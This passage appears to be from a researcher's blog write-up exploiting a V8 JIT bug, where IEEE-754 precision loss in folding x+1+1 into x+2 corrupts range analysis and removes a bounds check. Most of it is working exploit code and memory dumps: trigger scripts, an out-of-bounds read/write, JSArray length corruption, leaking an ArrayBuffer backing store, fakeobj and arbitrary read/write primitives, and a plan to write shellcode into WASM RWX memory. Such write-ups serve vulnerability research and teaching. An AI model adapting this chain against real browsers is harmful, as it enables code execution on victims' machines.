d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0de88    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0de90    0x4340000000000001  

[figures: exponent/mantissa bit patterns, computed exponent e, and fraction for the three values above]

For each number, we'll have the following computation.

[figure: step-by-step computations of the three values]

You can try the computations using links 1, 2 and 3.
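
To make the decoding concrete, here is a quick sanity check in plain JavaScript that reinterprets the raw 64-bit patterns dumped above back into doubles (print being the shell's output function):

let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);
let u64 = new BigUint64Array(buf);

// Reinterpret a raw 64-bit bit pattern as a double.
let bits2double = (i) => { u64[0] = i; return f64[0]; };

print(bits2double(0x433fffffffffffffn)); // 9007199254740991 == 2**53 - 1
print(bits2double(0x4340000000000000n)); // 9007199254740992 == 2**53
print(bits2double(0x4340000000000001n)); // 9007199254740994 == 2**53 + 2

Note how incrementing the bit pattern by one bumps the represented value by two: at this magnitude, consecutive doubles are 2 apart.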

As you can see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles; that's why it is not possible to increment 9007199254740992. You can, however, add 2 to 9007199254740992, because the result can be represented!

That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit.

d8> var x = Number.MAX_SAFE_INTEGER + 1
9007199254740992
d8> x + 1 + 1
9007199254740992
d8> x + 2
9007199254740994

Therefore, those two graphs are not equivalent.

[figure: the two non-equivalent graphs: x + 1 + 1 versus x + 2]

Furthermore, the reducer does not update the type of the changed node. The node therefore keeps its 'incorrect' Range(9007199254740992,9007199254740992) computed by the earlier Typer phase, instead of Range(9007199254740994,9007199254740994). (More generally, the problem is that we cannot take for granted that computing n + n is lossless, and therefore x += n; x += n; may not be equivalent to x += (n + n).)

There is going to be a mismatch between the addition result 9007199254740994 and the range type whose maximum value is 9007199254740992. What if we could use this buggy range analysis to make the simplified lowering phase reduce a CheckBounds node in a way that removes it?

It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range against the length, so that it believes the index is always in bounds when in reality it is not, thus removing what looks like a useless bounds check.

Let's check this by having yet another look at the sea of nodes!

First consider the following code.

let opt_me = (x) => {
  let arr = new Array(1.1,1.2,1.3,1.4);
  arr2 = new Array(42.1,42.0,42.0);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992
  // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction
  z = z - (4503599627370495*2); // max = 2 vs actual max = 4
  return arr[z];
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");
print(res);

We do get a graph that looks exactly like the problematic drawing shown before: instead of two NumberAdd(x, 1) nodes, we get a single NumberAdd(x, 2), which is not equivalent.

[figure: the reduced graph containing a single NumberAdd(x, 2)]

The maximum value of z will be the following :

d8> var x = 9007199254740992
d8> x = x + 2 // because of the buggy reducer!
9007199254740994
d8> x = x - (4503599627370495*2)
4

However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows :

d8> var x = 9007199254740992
d8> x = x  + 1
9007199254740992
d8> x = x  + 1
9007199254740992
d8> x = x - (4503599627370495*2)
2

Confirm that by looking at the graph.

[figure: CheckBounds with index type Range(0,2) and length type Range(4,4)]

The index type used by CheckBounds is Range(0,2) (but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index always looks in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further (the length is 4 and we read at index 4; you could also have an array of length 3 and read at index 3 or 4).

Actually, if we execute the script, we get some OOB access and leak memory!

$ d8 trigger.js --allow-natives-syntax
3.0046854007112e-310

Exploitation

Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory.

Improving the primitive

One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough.

For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out of bounds by 4 and not 2 anymore.

d8> sum = 007199254740989 + 9007199254740966
9014398509481956
d8> a = x + sum
18021597764222948
d8> b = x + 007199254740989 + 9007199254740966
18021597764222944
d8> a - b
4
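
If you want to hunt for such values systematically, a tiny helper (just a sketch, with an arbitrary candidate list) makes the search easy:

let x = Number.MAX_SAFE_INTEGER + 1;

// Delta between the 'reduced' form x + (n + n) and the chained form
// x + n + n: a non-zero delta means exploitable precision loss.
let delta = (n) => (x + (n + n)) - (x + n + n);

for (let n of [1, 4503599627370495, 9007199254740966])
  print(n + " -> delta of " + delta(n));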

And what if we do multiple additions to get even more precision loss, like x + n + n + n + n being transformed into x + 4n?

d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
undefined
d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x + sum
27035996273704904
d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
27035996273704896
d8> 27035996273704904 - 27035996273704896
8

Now we get a delta of 8.

Or maybe we could amplify the precision loss even more using other operators?

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> 10 * (x + 1 + 1)
90071992547409920
d8> 10 * (x + 2) 
90071992547409940

That gives us a delta of 20: the precision loss is 2 and it gets multiplied by 10.

Step 0 : Corrupting a FixedDoubleArray

First, we want to observe the memory layout to know what we are leaking and what we want to overwrite exactly. For that, I simply use my custom %DumpObjects v8 runtime function. Also, I use an ArrayBuffer with two views, one Float64Array and one BigUint64Array, to easily convert between 64-bit floats and 64-bit integers.

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
  fv[0] = f;
  return dv[0];
}

let hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let debug = (x,z, leak) => {
  print("oob index is " + z);
  print("length is " + x.length);
  print("leaked 0x" + hexprintablei(f2i(leak)));
  %DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
};

let opt_me = (x) => {
  let arr = new Array(1.1,1.2,1.3);
  arr2 = new Array(42.1,42.0,42.0);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1;
  z = z - (4503599627370495*2); 
  let leak = arr[z];
  if (x == "foo")
    debug(arr,z, leak);
  return leak;
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");

That gives the following results :

oob index is 4
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6a8    0x00002af7fe681451    MAP_TYPE    
0x00002e5fddf8b6b0    0x0000000300000000    
0x00002e5fddf8b6b8    0x3ff199999999999a    arr[0]
0x00002e5fddf8b6c0    0x3ff3333333333333    arr[1]
0x00002e5fddf8b6c8    0x3ff4cccccccccccd    arr[2]
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6d0    0x00002af7fe681451    MAP_TYPE // also arr[3]
0x00002e5fddf8b6d8    0x0000000300000000    arr[4] with OOB index!
0x00002e5fddf8b6e0    0x40450ccccccccccd    arr2[0] == 42.1
0x00002e5fddf8b6e8    0x4045000000000000    arr2[1] == 42.0
0x00002e5fddf8b6f0    0x4045000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00002e5fddf8b6f8    0x0000290fb3502cf1    MAP_TYPE    arr2 JSArray
0x00002e5fddf8b700    0x00002af7fe680c19    FIXED_ARRAY_TYPE [as]   
0x00002e5fddf8b708    0x00002e5fddf8b6d1    FIXED_DOUBLE_ARRAY_TYPE   

Obviously, the FixedDoubleArrays of arr and arr2 are contiguous. At arr[3] we've got arr2's map and at arr[4] we've got arr2's elements length (encoded as a Smi, which is 32 bits even on 64-bit platforms). Please note that we changed the trigger code a little bit :

< let arr = new Array(1.1,1.2,1.3,1.4);
---
> let arr = new Array(1.1,1.2,1.3);

Otherwise we would read/write the map instead, as the following dump demonstrates :

oob index is 4
length is 4
leaked 0x0000057520401451
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] -----
0x0000108bcf50b6c0    0x0000057520401451    MAP_TYPE    
0x0000108bcf50b6c8    0x0000000400000000    
0x0000108bcf50b6d0    0x3ff199999999999a    arr[0] == 1.1
0x0000108bcf50b6d8    0x3ff3333333333333    arr[1]
0x0000108bcf50b6e0    0x3ff4cccccccccccd    arr[2]
0x0000108bcf50b6e8    0x3ff6666666666666    arr[3] == 1.4
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000108bcf50b6f0    0x0000057520401451    MAP_TYPE    arr[4] with OOB index!
0x0000108bcf50b6f8    0x0000000300000000    
0x0000108bcf50b700    0x40450ccccccccccd    
0x0000108bcf50b708    0x4045000000000000    
0x0000108bcf50b710    0x4045000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000108bcf50b718    0x00001dd08d482cf1    MAP_TYPE    
0x0000108bcf50b720    0x0000057520400c19    FIXED_ARRAY_TYPE   
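
A side note on the dumps above: the length fields read 0x0000000300000000 and 0x0000000400000000 because, on 64-bit v8 builds of that era (no pointer compression), a Smi n is stored as n shifted left by 32 bits:

// Smi encoding on 64-bit v8 (no pointer compression): value << 32.
let smi = (n) => BigInt(n) << 32n;
print(smi(3).toString(16)); // 300000000, i.e. 0x0000000300000000 in memory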

Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store

The problem with step 0 is that we merely overwrite the FixedDoubleArray's length... which is pretty useless: this is not the field that actually controls the JSArray's length the way we expect, it just describes the memory allocated for the fixed array. The length we actually want to corrupt is the JSArray's.

Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that.

d8> let a = new Array(0);
undefined
d8> a.push(1);
1
d8> %DebugPrint(a)
DebugPrint: 0xd893a90aed1: [JSArray]
 - map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x1cf26798fdb1 <JSArray[0]>
 - elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS]
 - length: 1
 - properties: 0x367210500c19 <FixedArray[0]> {
    #length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x0d893a90d1c9 <FixedArray[17]> {
           0: 1
        1-16: 0x3672105005a9 <the_hole>
 }

In this case, even though the length of the JSArray is 1, the underlying FixedArray has a length of 17, which is just fine! But that is something that you want to keep in mind.

If you want an OOB R/W primitive, it's the JSArray's length that you want to overwrite. Also, if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak our code a bit to target the JSArray's length!

If you look at the memory dump, you may think that having the allocated JSArray before the FixedDoubleArray might be convenient, right?

Right now the layout is:

FIXED_DOUBLE_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE

Let's simply change the way we are allocating the second array.

23c23
<   arr2 = new Array(42.1,42.0,42.0);
---
>   arr2 = Array.of(42.1,42.0,42.0);

Now we have the following layout

FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
oob index is 4
length is 3
leaked 0x000009d6e6600c19
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000032adcd10b6b8    0x000009d6e6601451    MAP_TYPE    
0x000032adcd10b6c0    0x0000000300000000    
0x000032adcd10b6c8    0x3ff199999999999a    arr[0]
0x000032adcd10b6d0    0x3ff3333333333333    arr[1]
0x000032adcd10b6d8    0x3ff4cccccccccccd    arr[2]
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000032adcd10b6e0    0x000009b41ff82d41    MAP_TYPE map arr[3]  
0x000032adcd10b6e8    0x000009d6e6600c19    FIXED_ARRAY_TYPE properties arr[4]    
0x000032adcd10b6f0    0x000032adcd10b729    FIXED_DOUBLE_ARRAY_TYPE elements    
0x000032adcd10b6f8    0x0000000300000000    

Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field.

Thanks to the precision loss when transforming +1+1 into +2, we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 gives us exactly that!

d8> x + 1 + 1 + 1
9007199254740992
d8> x + 3
9007199254740996
26c26
<   z = z + 1 + 1;
---
>   z = z + 1 + 1 + 1;

Now we are able to read/write the JSArray's length.

oob index is 6
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000004144950b6e0    0x00001b7451b01451    MAP_TYPE    
0x000004144950b6e8    0x0000000300000000    
0x000004144950b6f0    0x3ff199999999999a    // arr[0]
0x000004144950b6f8    0x3ff3333333333333  
0x000004144950b700    0x3ff4cccccccccccd    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000004144950b708    0x0000285651602d41    MAP_TYPE    
0x000004144950b710    0x00001b7451b00c19    FIXED_ARRAY_TYPE    
0x000004144950b718    0x000004144950b751    FIXED_DOUBLE_ARRAY_TYPE    
0x000004144950b720    0x0000000300000000    // arr[6]

Leaking the ArrayBuffer's backing store pointer is now very easy: just allocate the buffer right after the second JSArray.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
ab = new ArrayBuffer(AB_LENGTH);

This way, we get the following memory layout :

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00003a4d7608bb48    0x000023fe25c01451    MAP_TYPE    
0x00003a4d7608bb50    0x0000000300000000    
0x00003a4d7608bb58    0x3ff199999999999a    arr[0]
0x00003a4d7608bb60    0x3ff199999999999a    
0x00003a4d7608bb68    0x3ff199999999999a    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00003a4d7608bb70    0x000034dc44482d41    MAP_TYPE    
0x00003a4d7608bb78    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bb80    0x00003a4d7608bba9    FIXED_DOUBLE_ARRAY_TYPE    
0x00003a4d7608bb88    0x0000006400000000    
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bb90    0x000023fe25c007a9    MAP_TYPE    
0x00003a4d7608bb98    0x0000000100000000    
0x00003a4d7608bba0    0x000023fe25c005a9    ODDBALL_TYPE    
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bba8    0x000023fe25c01451    MAP_TYPE    
0x00003a4d7608bbb0    0x0000000100000000    
0x00003a4d7608bbb8    0x3ff3333333333333    arr2[0]
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x00003a4d7608bbc0    0x000034dc444821b1    MAP_TYPE    
0x00003a4d7608bbc8    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bbd0    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bbd8    0x0000000000000100    ab's byte_length (AB_LENGTH == 0x100)
0x00003a4d7608bbe0    0x0000556b8fdaea00    ab's backing_store pointer!
0x00003a4d7608bbe8    0x0000000000000002    
0x00003a4d7608bbf0    0x0000000000000000    
0x00003a4d7608bbf8    0x0000000000000000   

We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because the memory pointed to by the backing_store is fully controlled by us: we can put arbitrary data in it through a data view (like a Uint32Array).
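
A minimal sketch of that read (f2i and i2f are the helpers from step 0; the full exploit below locates the index dynamically with indexOf rather than hardcoding it):

// arr2.length is corrupted, so reading past its elements reaches ab's fields.
let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH)); // find ab's byte_length field
let backing_store = f2i(arr2[ab_len_idx + 1]); // raw, untagged pointer
print("[+] backing store @ 0x" + backing_store.toString(16));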

Now that we know a pointer to some fully controlled content, let's go to step 2!

Step 2 : Getting a fake object

Arrays of the PACKED_ELEMENTS kind can contain tagged pointers to JavaScript objects. For those unfamiliar with v8, the elements kind of a JSArray gives information about the type of elements it is storing. Read this if you want to know more about elements kinds.

[figure: the elements kind lattice]

d8> var objects = new Array(new Object())
d8> %DebugPrint(objects)
DebugPrint: 0xd79e750aee9: [JSArray]
 - elements: 0x0d79e750af19 <FixedArray[1]> {
           0: 0x0d79e750aeb1 <Object map = 0x19c550d80451>
 }
0x19c550d82d91: [Map]
 - elements kind: PACKED_ELEMENTS

Therefore, if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive: simply put the address backing_store+1 in this array (the original pointer is not tagged; v8 expects pointers to JavaScript objects to be tagged). Let's first simply write the value 0x414141414141 into the controlled memory.

Indeed, we know that the very first field of any object is a pointer to a map (long story short, the map is the object that describes the type of the object; other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post).

Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map.

Achieving this is as easy as allocating an array with an object pointer, looking for the index of the object pointer, and replacing it with the (tagged) pointer to the previously leaked backing_store.
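
Concretely, tagging just means setting the pointer's least significant bit, which is how v8 distinguishes HeapObject pointers from Smis. This is the tagFloat helper the full exploit uses (fv and dv being the two views from step 0):

// Reinterpret the leaked double as raw bits, set the HeapObject tag (+1),
// and reinterpret back into a double we can store through arr2.
let tagFloat = (f) => {
  fv[0] = f;
  dv[0] += 1n;
  return fv[0];
}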

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
evil_ab = new ArrayBuffer(AB_LENGTH);
packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI);

Quickly check the memory layout.

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec82410    0x0000353622a01451    MAP_TYPE    
0x0000220f2ec82418    0x0000000300000000    
0x0000220f2ec82420    0x3ff199999999999a    
0x0000220f2ec82428    0x3ff199999999999a    
0x0000220f2ec82430    0x3ff199999999999a    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec82438    0x0000261a44682d41    MAP_TYPE    
0x0000220f2ec82440    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec82448    0x0000220f2ec82471    FIXED_DOUBLE_ARRAY_TYPE    
0x0000220f2ec82450    0x0000006400000000    
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82458    0x0000353622a007a9    MAP_TYPE    
0x0000220f2ec82460    0x0000000100000000    
0x0000220f2ec82468    0x0000353622a005a9    ODDBALL_TYPE    
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82470    0x0000353622a01451    MAP_TYPE    
0x0000220f2ec82478    0x0000000100000000    
0x0000220f2ec82480    0x3ff3333333333333    
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x0000220f2ec82488    0x0000261a446821b1    MAP_TYPE    
0x0000220f2ec82490    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec82498    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec824a0    0x0000000000000100    
0x0000220f2ec824a8    0x00005599e4b21f40    
0x0000220f2ec824b0    0x0000000000000002    
0x0000220f2ec824b8    0x0000000000000000    
0x0000220f2ec824c0    0x0000000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec824c8    0x0000261a44682de1    MAP_TYPE    
0x0000220f2ec824d0    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec824d8    0x0000220f2ec824e9    FIXED_ARRAY_TYPE    
0x0000220f2ec824e0    0x0000000300000000    
----- [ FIXED_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec824e8    0x0000353622a007a9    MAP_TYPE    
0x0000220f2ec824f0    0x0000000300000000    
0x0000220f2ec824f8    0x0000001300000000    // MARK 1 for memory scanning
0x0000220f2ec82500    0x00002f3befd86b81    JS_OBJECT_TYPE    
0x0000220f2ec82508    0x0000003700000000    // MARK 2 for memory scanning

Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. Observe that we put markers so we can scan memory instead of hardcoding offsets (which would break if we got a different memory layout for whatever reason).

After locating the (oob) index to the object pointer, simply overwrite it and use it.

let view = new BigUint64Array(evil_ab);
view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer
// ...
arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr);
packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer

Et voilà!

Step 3 : Arbitrary read/write primitive

Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that looks like an actual object. More specifically, we would like to craft a fake ArrayBuffer with a controlled backing_store pointer. You could also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call!

Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode).

let view = new BigUint64Array(evil_ab);
for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
  view[i] = f2i(arr2[ab_len_idx-3+i]);
  if (view[i] > 0x10000 && !(view[i] & 1n))
    view[i] = 0x42424242n; // backing_store
}
// [...]
arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer
// [...]
let rw_view = new Uint32Array(packed_elements_array[1]);
rw_view[0] = 0x1337; // *0x42424242 = 0x1337

You should get a crash like this.

$ d8 rw.js 
[+] corrupted JSArray's length
[+] Found backingstore pointer : 0000555c593d9890
Received signal 11 SEGV_MAPERR 000042424242
==== C stack trace ===============================
 [0x555c577b81a4]
 [0x7ffa0331a390]
 [0x555c5711b4ae]
 [0x555c5728c967]
 [0x555c572dc50f]
 [0x555c572dbea5]
 [0x555c572dbc55]
 [0x555c57431254]
 [0x555c572102fc]
 [0x555c57215f66]
 [0x555c576fadeb]
[end of stack trace]

Step 4 : Overwriting WASM RWX memory

Now that we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse (0vercl0k did this for SpiderMonkey).

V8 used to have the JIT'ed code of its JSFunctions located in RWX memory. But this is not the case anymore. However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is instantiate a WASM module and, starting from one of its functions, find the WASM instance object, which contains a pointer to the RWX memory in its JumpTableStart field.
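
The WASM module itself is loaded from a separate wasm.js file that is not reproduced in this post. As an illustration (an assumption on my part, not the author's actual file), a minimal stand-in can use the classic smallest module that exports a main function returning 42:

// Classic minimal WASM module: exports a "main" function returning 42.
// Instantiating it is enough to get JIT'ed WASM code, and thus an RWX
// jump table, mapped into the process.
let wasm_code = new Uint8Array([
  0x00,0x61,0x73,0x6d,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,
  0x01,0x60,0x00,0x01,0x7f,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,
  0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,
  0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,
  0x80,0x80,0x00,0x02,0x06,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x02,0x00,0x04,
  0x6d,0x61,0x69,0x6e,0x00,0x00,0x0a,0x8a,0x80,0x80,0x80,0x00,0x01,0x84,
  0x80,0x80,0x80,0x00,0x00,0x41,0x2a,0x0b
]);
let wasm_module = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_module);
let get_pwnd = wasm_instance.exports.main; // the exploit expects this name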

Plan of action:

  1. Read the JSFunction's shared function info
  2. Get the WASM exported function from the shared function info
  3. Get the WASM instance from the exported function
  4. Read the JumpTableStart field from the WASM instance

As I mentioned above, I use a modified v8 engine in which I implemented a %DumpObjects feature that prints an annotated memory dump. It makes it very easy to understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (use it at your own risk as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it.

%DumpObjects will pinpoint the pointer like this:

----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
[...]
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]

So let's just find the RWX memory from a WASM function.

sample_wasm.js can be found here.

d8> load("sample_wasm.js")
d8> %DumpObjects(global_test,10)
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE    
0x00002fac7911ed30    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
0x00002fac7911ed38    0x00000d1caca00691    FEEDBACK_CELL_TYPE    
0x00002fac7911ed40    0x00002dc28a002001    CODE_TYPE    
----- [ TRANSITION_ARRAY_TYPE : 0x30 ] -----
0x00002fac7911ed48    0x00000cdfc0080b69    MAP_TYPE    
0x00002fac7911ed50    0x0000000400000000    
0x00002fac7911ed58    0x0000000000000000    
function 1() { [native code] }
d8> %DumpObjects(0x00002fac7911ecd9,11)
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE    
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ed00    0x000000000000004f    
0x00002fac7911ed08    0x000000000000ff00    
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE    
52417812098265
d8> %DumpObjects(0x00002fac7911ecb1,11)
----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] -----
0x00002fac7911ecb0    0x00000cdfc00857a9    MAP_TYPE    
0x00002fac7911ecb8    0x00002dc28a002001    CODE_TYPE    
0x00002fac7911ecc0    0x00002fac7911eb29    WASM_INSTANCE_TYPE    
0x00002fac7911ecc8    0x0000000000000000    
0x00002fac7911ecd0    0x0000000100000000    
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE    
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ed00    0x000000000000004f    
52417812098225
d8> %DumpObjects(0x00002fac7911eb29,41)
----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
0x00002fac7911eb28    0x00001024ebc89411    MAP_TYPE    
0x00002fac7911eb30    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911eb38    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911eb40    0x00002073d820bac1    WASM_MODULE_TYPE    
0x00002fac7911eb48    0x00002073d820bcf1    JS_OBJECT_TYPE    
0x00002fac7911eb50    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
0x00002fac7911eb58    0x00002fac7911ec59    WASM_MEMORY_TYPE    
0x00002fac7911eb60    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb68    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb70    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb78    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb80    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb88    0x00002073d820bc79    FIXED_ARRAY_TYPE    
0x00002fac7911eb90    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb98    0x00002073d820bc69    FOREIGN_TYPE    
0x00002fac7911eba0    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eba8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ebb0    0x00000cdfc00801d1    ODDBALL_TYPE    
0x00002fac7911ebb8    0x00002dc289f94d21    CODE_TYPE    
0x00002fac7911ebc0    0x0000000000000000    
0x00002fac7911ebc8    0x00007f9f9cf60000    
0x00002fac7911ebd0    0x0000000000010000    
0x00002fac7911ebd8    0x000000000000ffff    
0x00002fac7911ebe0    0x0000556b3a3e0c00    
0x00002fac7911ebe8    0x0000556b3a3ea630    
0x00002fac7911ebf0    0x0000556b3a3ea620    
0x00002fac7911ebf8    0x0000556b3a47c210    
0x00002fac7911ec00    0x0000000000000000    
0x00002fac7911ec08    0x0000556b3a47c230    
0x00002fac7911ec10    0x0000000000000000    
